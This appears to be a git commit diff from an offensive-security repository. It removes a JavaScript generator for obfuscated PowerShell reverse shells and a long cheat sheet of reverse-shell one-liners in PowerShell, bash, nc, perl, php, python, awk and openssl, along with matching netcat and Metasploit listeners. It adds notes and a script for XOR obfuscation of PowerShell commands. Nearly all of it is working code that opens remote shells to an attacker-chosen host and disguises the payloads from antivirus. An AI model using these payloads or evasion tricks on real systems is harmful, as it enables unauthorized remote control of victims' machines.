migration
This commit is contained in:
-267
@@ -1,267 +0,0 @@
|
||||
const psOne = '$LHOST = "<host>"; $LPORT = <port>; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()';
|
||||
|
||||
const psTwo = 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient("<host>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"';
|
||||
|
||||
const psThree = 'powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient("<host>", <port>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + "SHELL> ");$StreamWriter.Flush()}WriteToStream "";while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"';
|
||||
|
||||
const psFourTLS = '$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient("<host>", <port>);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient("cloudflare-dns.com",$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + "SHELL> ");$StreamWriter.Flush()};WriteToStream "";while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()';
|
||||
|
||||
const psRevRaw = [psOne, psTwo, psThree, psFourTLS];
|
||||
|
||||
const listenerOne = 'nc -lvnp <port>'; // nc cleartext tcp
|
||||
|
||||
const listenerTwo = 'nc -u -lvp <port>'; // nc cleartext udp
|
||||
|
||||
const listenerThree = 'sudo ncat -lvnp <port>'; // ncat cleartext tcp
|
||||
|
||||
const listenerFour = 'sudo ncat --ssl -lvnp <port>'; // ncat TLS // issues with this so far
|
||||
|
||||
const listenerFive = 'sudo openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 30 -nodes; sudo openssl s_server -quiet -key key.pem -cert cert.pem -port <port>' // openssl TLS
|
||||
|
||||
const listenerSix = 'sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 127.0.0.1; set lport <port>; exploit"' // msfconsole (metasploit) TCP // needs testing
|
||||
|
||||
const listenerSeven = 'sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_udp; set lhost 127.0.0.1; set lport <port>; exploit"' // msfconsole (metasploit) UDP // needs testing
|
||||
|
||||
const listenersRaw = [listenerOne, listenerTwo, listenerThree, listenerFour, listenerFive, listenerSix, listenerSeven];
|
||||
|
||||
// mangle
|
||||
const mangleExprPre = '$mangledStr=\'';
|
||||
const mangleExprPost = '\';$staticStrArr="new","net","client","tcp","object","new","mkfifo","socket","tmp","security","ssl","stream","\$","buff","out","system","proto","expre","invoke","flush","auth",".",";";$replaceStrArr="dfi1","wiggleworm","nOt4t0","d00d1eb0p","unpotat","soiledpeanuts","tinylittledragons","thetiniestofhorses","capitalismisascam","bramblebush","ins4ecureSilly","456yt","\@\@\@\^","muscleperverts","inniebellybutton","ponishouldponiponi","ayylemone","testicles","lololol","teppidwater","orderhotwaterataniceresteraunt","deee","onoamouse";$demangledStr=$mangledStr;for($i=0;$i -le $staticStrArr.length;$i++){$demangledStr = $demangledStr -replace $replaceStrArr[$i],$staticStrArr[$i]};invoke-expression $demangledStr&'
|
||||
|
||||
const replaceStrArr = ['dfi1', 'wiggleworm', 'nOt4t0', 'd00d1eb0p', 'unpotat', 'soiledpeanuts', 'tinylittledragons', 'thetiniestofhorses', 'capitalismisascam','bramblebush', 'ins4ecureSilly', '456yt', '@@@^', 'muscleperverts', 'inniebellybutton', 'ponishouldponiponi', 'ayylemone', 'testicles', 'lololol', 'teppidwater', 'orderhotwaterataniceresteraunt', 'deee', 'onoamouse'];
|
||||
|
||||
const findStrArr = [/new/gi, /net/gi, /client/gi, /tcp/gi, /object/gi, /new/gi, /mkfifo/gi, /socket/gi, /tmp/gi, /security/gi, /ssl/gi, /stream/gi, /\$/gi, /buff/gi, /out/gi, /system/gi, /proto/gi, /expre/gi, /invoke/gi, /flush/gi, /auth/gi, /\./gi, /;/gi];
|
||||
|
||||
const staticStrArr = ['new', 'net', 'client', 'tcp', 'object', 'new', 'mkfifo', 'socket', 'tmp', 'security', 'ssl', 'stream', '$', 'buff', 'out', 'system', 'proto', 'expre', 'invoke', 'flush', 'auth', '.', ';'];
|
||||
|
||||
function setContents(elemId, elemContents) {
|
||||
document.getElementById(elemId).innerHTML = elemContents;
|
||||
}
|
||||
|
||||
function showId(elemId) {
|
||||
document.getElementById(elemId).style.display = "block";
|
||||
}
|
||||
|
||||
function hideId(elemId) {
|
||||
document.getElementById(elemId).style.display = "none";
|
||||
}
|
||||
|
||||
function getVal(elemId) {
|
||||
return document.getElementById(elemId).value;
|
||||
}
|
||||
|
||||
function mangleRevShell(revShellStr) {
|
||||
let mangiemut = revShellStr;
|
||||
|
||||
for(let i=0; i<findStrArr.length; i++) {
|
||||
mangiemut = mangiemut.replaceAll(findStrArr[i], replaceStrArr[i]);
|
||||
}
|
||||
|
||||
const mangleExprExe = mangleExprPre+mangiemut+mangleExprPost;
|
||||
return mangleExprExe;
|
||||
}
|
||||
|
||||
function demangleRevShell(mangledRevShellStr) {
|
||||
let cutedoggy = mangledRevShellStr;
|
||||
for(let i=0; i<findStrArr.length; i++) {
|
||||
cutedoggy = cutedoggy.replaceAll(replaceStrArr[i], staticStrArr[i]);
|
||||
}
|
||||
|
||||
return cutedoggy;
|
||||
}
|
||||
|
||||
function encodeUTF16LE(str) { // props Keveun https://stackoverflow.com/questions/24379446/utf-8-to-utf-16le-javascript
|
||||
var out, i, len, c;
|
||||
var char2, char3;
|
||||
|
||||
out = "";
|
||||
len = str.length;
|
||||
i = 0;
|
||||
while(i < len) {
|
||||
c = str.charCodeAt(i++);
|
||||
switch(c >> 4)
|
||||
{
|
||||
case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
|
||||
// 0xxxxxxx
|
||||
out += str.charAt(i-1);
|
||||
break;
|
||||
case 12: case 13:
|
||||
// 110x xxxx 10xx xxxx
|
||||
char2 = str.charCodeAt(i++);
|
||||
out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
|
||||
out += str.charAt(i-1);
|
||||
break;
|
||||
case 14:
|
||||
// 1110 xxxx 10xx xxxx 10xx xxxx
|
||||
char2 = str.charCodeAt(i++);
|
||||
char3 = str.charCodeAt(i++);
|
||||
out += String.fromCharCode(((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) | ((char3 & 0x3F) << 0));
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
var byteArray = new Uint8Array(out.length * 2);
|
||||
for (var i = 0; i < out.length; i++) {
|
||||
byteArray[i*2] = out.charCodeAt(i); // & 0xff;
|
||||
byteArray[i*2+1] = out.charCodeAt(i) >> 8; // & 0xff;
|
||||
}
|
||||
|
||||
return String.fromCharCode.apply( String, byteArray );
|
||||
}
|
||||
|
||||
function genShell() {
|
||||
const rstype = document.getElementById("rstype").value;
|
||||
const psRevStringRaw = psRevRaw[rstype];
|
||||
encodePS(psRevStringRaw);
|
||||
}
|
||||
|
||||
function randInt(min=2, max=7) {
|
||||
const minCeil = Math.ceil(min);
|
||||
const maxFloor = Math.floor(max);
|
||||
return Math.floor(Math.random() * (maxFloor - minCeil) + minCeil);
|
||||
}
|
||||
|
||||
function randVarname(minLen=2, maxLen=7, charSet='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789') {
|
||||
let out = '';
|
||||
const randLen = randInt(minLen, maxLen);
|
||||
const charsLen = charSet.length;
|
||||
|
||||
for (let i=0; i<randLen; i++) {
|
||||
out += charSet.charAt(Math.floor(Math.random() * charsLen));
|
||||
}
|
||||
|
||||
return '$'+out; // prepend the $ for powersuck
|
||||
}
|
||||
|
||||
function configShell(rawShellString, host, port/*, shell*/) {
|
||||
let moddedCmdString = rawShellString;
|
||||
moddedCmdString = moddedCmdString.replaceAll(/<host>/gi, host);
|
||||
moddedCmdString = moddedCmdString.replaceAll(/<port>/gi, port);
|
||||
|
||||
// moddedCmdString = moddedCmdString.replaceAll(/<shell>/gi, shell); // for when we evolve past ps lmao
|
||||
return moddedCmdString;
|
||||
}
|
||||
|
||||
function psEncodeBase64Exe(shellStr) {
|
||||
// for `powershell -e $base64EncodedData` to work, the commands need to be first encoded into Unicode/UTF-16 LE (Windows default) than base64 encoded
|
||||
const psEncodedlUTF16LE = encodeUTF16LE(shellStr);
|
||||
const base64EncodedPSExecutable = "powershell -e " + btoa(psEncodedlUTF16LE);
|
||||
return base64EncodedPSExecutable;
|
||||
}
|
||||
|
||||
function encodePS(rawShellString, listenerShow=true) {
|
||||
const host = getVal("host");
|
||||
const port = getVal("port");
|
||||
const rstype = getVal("listenertype");
|
||||
const minLen = getVal("minLen");
|
||||
const maxLen = getVal("maxLen");
|
||||
|
||||
let matchies = rawShellString.match(/\$(?!null|zero|false|true|script|buffer)[a-z0-9-_]{1,30}/gi);
|
||||
|
||||
if(matchies) {
|
||||
const varsLen = matchies.length;
|
||||
|
||||
let randVarSubArr = new Array();
|
||||
var moddedCmdString = configShell(rawShellString, host, port);
|
||||
|
||||
for(let i=0; i<varsLen; i++) {
|
||||
const newRandVar = randVarname(minLen, maxLen);
|
||||
|
||||
randVarSubArr.push(newRandVar);
|
||||
|
||||
moddedCmdString = moddedCmdString.replaceAll(matchies[i], newRandVar);
|
||||
}
|
||||
} else {
|
||||
moddedCmdString = rawShellString;
|
||||
}
|
||||
|
||||
const base64EncodedPSExecutable = psEncodeBase64Exe(moddedCmdString);
|
||||
const mangledCmd = mangleRevShell(moddedCmdString);
|
||||
const mangEncCmd = psEncodeBase64Exe(mangleRevShell(moddedCmdString).slice(0, -1));
|
||||
const listener = configShell(listenersRaw[rstype], host, port);
|
||||
|
||||
setContents("hiddenOutput", base64EncodedPSExecutable);
|
||||
setContents("hiddenUnencoded", moddedCmdString);
|
||||
setContents("mangledpayload", mangledCmd);
|
||||
setContents("mangledencodedpayload", mangEncCmd);
|
||||
setContents("listener", listener);
|
||||
|
||||
showId("encodedDiv");
|
||||
showId("unencodedDiv");
|
||||
showId("mangledDiv");
|
||||
showId("mangledEncodedDiv");
|
||||
|
||||
if(listenerShow) {
|
||||
showId("listenerDiv");
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
function copyCmd(textarea, doneMsg) {
|
||||
const cmdCopyText = document.getElementById(textarea); // no .value here
|
||||
|
||||
cmdCopyText.select(); // select da text
|
||||
cmdCopyText.setSelectionRange(0, 99999); // mobilefags
|
||||
|
||||
navigator.clipboard.writeText(cmdCopyText.value); // copy to clipboard
|
||||
|
||||
// flash the "done" message for 500ms
|
||||
document.getElementById(doneMsg).style.display = "inline";
|
||||
|
||||
setTimeout(function() {
|
||||
hideId(doneMsg);
|
||||
document.getSelection().removeAllRanges()
|
||||
}, 500);
|
||||
}
|
||||
|
||||
function swapMode(mode) {
|
||||
if(mode == 'revshell') {
|
||||
showId('revshellgencontainer');
|
||||
|
||||
hideId('encodepscontainer');
|
||||
hideId('mangledDiv');
|
||||
hideId('listenerDiv');
|
||||
hideId("unencodedDiv");
|
||||
hideId("mangledEncodedDiv");
|
||||
} else if(mode == 'psencode') {
|
||||
showId('encodepscontainer');
|
||||
|
||||
hideId('mangledDiv');
|
||||
hideId('revshellgencontainer');
|
||||
hideId('listenerDiv');
|
||||
hideId("unencodedDiv");
|
||||
hideId("mangledEncodedDiv");
|
||||
}
|
||||
|
||||
hideId('encodedDiv'); // output div
|
||||
}
|
||||
|
||||
function doHelp(subject) {
|
||||
switch(subject) {
|
||||
case 'randomvars':
|
||||
helpText = 'randomized variables';
|
||||
break;
|
||||
|
||||
case 'encoded':
|
||||
helpText = 'base64 encoded';
|
||||
break;
|
||||
|
||||
case 'mangled':
|
||||
helpText = 'Mangled by substituting common strings with nonsense and then reversing the process on the fly';
|
||||
break;
|
||||
|
||||
case 'mangledencoded':
|
||||
helpText = 'first variables are randomized, then it is mangled, then it is base64 encoded';
|
||||
break;
|
||||
|
||||
case 'listener':
|
||||
helpText = 'this is run on your server to listen for when the reverse shell dials back to you';
|
||||
break;
|
||||
|
||||
default:
|
||||
helpText = 'ERROR: Help text not found uwu sowwy~';
|
||||
break;
|
||||
}
|
||||
|
||||
alert(helpText);
|
||||
}
|
||||
@@ -0,0 +1,76 @@
|
||||
binary opeations:
|
||||
$a -band $b and
|
||||
$a -bnot $b not
|
||||
$a -bor $b or
|
||||
$a -bxor $b xor
|
||||
$a -shr $b right shift
|
||||
$a -shl $b left shift
|
||||
|
||||
xor on a byte array:
|
||||
for($i=0;$i -lt $bytes.count;$i++){$bytes[$i]=$bytes[$i] -bxor 0x6A}
|
||||
|
||||
convert string to byte array:
|
||||
$bytes=[System.Text.Encoding]::UTF8.GetBytes($secret)
|
||||
convert byte array to string:
|
||||
$string=[System.Text.Encoding]::UTF8.GetString($bytes)
|
||||
|
||||
a xor b can be reversed by the same exact operation
|
||||
|
||||
$shellStr = "echo henloamf";
|
||||
|
||||
|
||||
$sillystring='henloloamf';$sillyxorkey=0x3b;$bytes=[System.Text.Encoding]::Unicode.GetBytes($sillystring);for($i=0;$i -lt $bytes.count;$i++){$bytes[$i]=$bytes[$i] -bxor $sillyxorkey};$string=[System.Text.Encoding]::UTF8.GetString($bytes);$string
|
||||
|
||||
$sillyxorkey=0x3b;$bytes=[System.Text.Encoding]::Unicode.GetBytes($string);for($i=0;$i -lt $bytes.count;$i++){$bytes[$i]=$bytes[$i] -bxor $sillyxorkey};$string2=[System.Text.Encoding]::UTF8.GetString($bytes);$string2
|
||||
|
||||
[char]0x0048 manually encoded unicode
|
||||
|
||||
$encoding = [System.Text.Encoding]::UTF8
|
||||
$input = 'input string thingy'
|
||||
$output = $encoding.GetBytes($input)
|
||||
|
||||
$bytes = [System.Text.Encoding]::UTF8.GetBytes($input)
|
||||
$string = [System.Text.Encoding]::UTF8.GetString($bytes)
|
||||
|
||||
|
||||
# encode to bytes
|
||||
$in = "input string thingy";
|
||||
$bytes = [System.Text.Encoding]::UTF8.GetBytes($in);
|
||||
|
||||
# decode from bytes
|
||||
$str = [System.Text.Encoding]::UTF8.GetString($bytes);
|
||||
$str;
|
||||
|
||||
# encode to bytes and xor
|
||||
$key = 0xA3;
|
||||
$str = "echo hemanloanf";
|
||||
$bytes = [System.Text.Encoding]::UTF8.GetBytes($str);
|
||||
$bytes;
|
||||
for($i = 0; $i -lt $bytes.length; $i++) {
|
||||
$bytes[$i]=$bytes[$i] -bxor $key;
|
||||
}
|
||||
$bytes;
|
||||
|
||||
# decode back to string
|
||||
for($i = 0; $i -lt $bytes.length; $i++) {
|
||||
$bytes[$i]=$bytes[$i] -bxor $key;
|
||||
}
|
||||
|
||||
$str = [System.Text.Encoding]::UTF8.GetString($bytes);
|
||||
$str
|
||||
|
||||
# xor obsfuscation and exe oneliner
|
||||
# encode
|
||||
$key = 0xA3;
|
||||
$str = "echo hemanloanf";
|
||||
$bytes = [System.Text.Encoding]::UTF8.GetBytes($str);
|
||||
for($i = 0; $i -lt $bytes.length; $i++) { $bytes[$i]=$bytes[$i] -bxor $key; }
|
||||
|
||||
# xor encode oneliner
|
||||
$key=0xA3;$str="echo hanloand";$bytes=[System.Text.Encoding]::UTF8.GetBytes($str);for($i=0;$i -lt $bytes.length;$i++){$bytes[$i]=$bytes[$i] -bxor $key;};
|
||||
# $bytes
|
||||
|
||||
# decode and execute oneliner
|
||||
$key=0xA3;for($i=0;$i -lt $bytes.length;$i++){$bytes[$i]=$bytes[$i] -bxor $key};$str=[System.Text.Encoding]::UTF8.GetString($bytes);
|
||||
# $str
|
||||
|
||||
@@ -1,118 +0,0 @@
|
||||
revshells:
|
||||
powershell:
|
||||
Cleartext:
|
||||
$LHOST = "<host>"; $LPORT = <port>; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
|
||||
|
||||
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<host>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
|
||||
|
||||
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('<host>', <port>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
|
||||
|
||||
C='curl -Ns telnet://<host>:<port>'; $C </dev/null 2>&1 | <shell> 2>&1 | $C >/dev/null
|
||||
|
||||
// udp
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|<shell> -i 2>&1|ncat -u <host> <port> >/tmp/f
|
||||
|
||||
ncat.exe <host> <port> -e <shell>
|
||||
|
||||
ncat <host> <port> -e <shell>
|
||||
|
||||
nc -c <shell> <host> <port>
|
||||
|
||||
nc <host> <port> -e <shell>
|
||||
|
||||
nc.exe <host> <port> -e <shell>
|
||||
|
||||
perl -e 'use Socket;$i="<host>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("<shell> -i");};'
|
||||
|
||||
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<host>:<port>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||
|
||||
php -r '$sock=fsockopen("<host>",<port>);exec("<shell> <&3 >&3 2>&3");'
|
||||
|
||||
php -r '$sock=fsockopen("<host>",<port>);shell_exec("<shell> <&3 >&3 2>&3");'
|
||||
|
||||
php -r '$sock=fsockopen("<host>",<port>);system("<shell> <&3 >&3 2>&3");'
|
||||
|
||||
php -r '$sock=fsockopen("<host>",<port>);passthru("<shell> <&3 >&3 2>&3");'
|
||||
|
||||
php -r '$sock=fsockopen("<host>",<port>);`<shell> <&3 >&3 2>&3`;'
|
||||
|
||||
php -r '$sock=fsockopen("<host>",<port>);popen("<shell> <&3 >&3 2>&3", "r");'
|
||||
|
||||
php -r '$sock=fsockopen("<host>",<port>);$proc=proc_open("<shell>", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
|
||||
|
||||
|
||||
|
||||
TLS: // giving cert error on ncat TLS listener
|
||||
$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('<host>', <port>);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
|
||||
|
||||
openssl:
|
||||
mkfifo /tmp/s; <shell> -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <host>:<port> > /tmp/s; rm /tmp/s
|
||||
*nix:
|
||||
awk 'BEGIN {s = "/inet/tcp/0/<host>/<port>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
|
||||
|
||||
zsh -c 'zmodload zsh/net/tcp && ztcp <host> <port> && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
|
||||
|
||||
TF=$(mktemp -u);mkfifo $TF && telnet <host> <port> 0<$TF | bash 1>$TF
|
||||
|
||||
// udp
|
||||
<shell> -i >& /dev/udp/<host>/<port> 0>&1
|
||||
|
||||
<shell> -i 5<> /dev/tcp/<host>/<port> 0<&5 1>&5 2>&5
|
||||
|
||||
exec 5<>/dev/tcp/<host>/<port>;cat <&5 | while read line; do $line 2>&5 >&5; done
|
||||
|
||||
0<&196;exec 196<>/dev/tcp/<host>/<port>; <shell> <&196 >&196 2>&196
|
||||
|
||||
<shell> -i >& /dev/tcp/<host>/<port> 0>&1
|
||||
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|<shell> -i 2>&1|nc <host> <port> >/tmp/f
|
||||
|
||||
python:
|
||||
<shell>: "bash", "powershell", "zsh", "cmd", etc
|
||||
|
||||
export RHOST="<host>";export RPORT=<port>;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("<shell>")'
|
||||
|
||||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<host>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("<shell>")'
|
||||
|
||||
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<host>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("<port>")'
|
||||
|
||||
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("<host>",<port>));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("<shell>")'
|
||||
|
||||
windows:
|
||||
```
|
||||
import os,socket,subprocess,threading;
|
||||
def s2p(s, p):
|
||||
while True:
|
||||
data = s.recv(1024)
|
||||
if len(data) > 0:
|
||||
p.stdin.write(data)
|
||||
p.stdin.flush()
|
||||
|
||||
def p2s(s, p):
|
||||
while True:
|
||||
s.send(p.stdout.read(1))
|
||||
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
s.connect(("<host>",<port>))
|
||||
|
||||
p=subprocess.Popen(["<shell>"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
|
||||
|
||||
s2p_thread = threading.Thread(target=s2p, args=[s, p])
|
||||
s2p_thread.daemon = True
|
||||
s2p_thread.start()
|
||||
|
||||
p2s_thread = threading.Thread(target=p2s, args=[s, p])
|
||||
p2s_thread.daemon = True
|
||||
p2s_thread.start()
|
||||
|
||||
try:
|
||||
p.wait()
|
||||
except KeyboardInterrupt:
|
||||
s.close()
|
||||
```
|
||||
|
||||
|
||||
|
||||
Listeners:
|
||||
ncat TLS:
|
||||
sudo ncat --ssl -lvnp <port>
|
||||
@@ -0,0 +1,15 @@
|
||||
param (
|
||||
[Parameter(Mandatory=$true)]
|
||||
[byte]$key,
|
||||
[string]$cmd
|
||||
)
|
||||
|
||||
$bytes=[System.Text.Encoding]::UTF8.GetBytes($cmd)
|
||||
|
||||
for($i = 0; $i -lt $bytes.length; $i++) {
|
||||
$bytes[$i]=$bytes[$i] -bxor $key
|
||||
}
|
||||
|
||||
$bytes
|
||||
|
||||
[System.Text.Encoding]::UTF8.GetString($bytes)
|
||||
Reference in New Issue
Block a user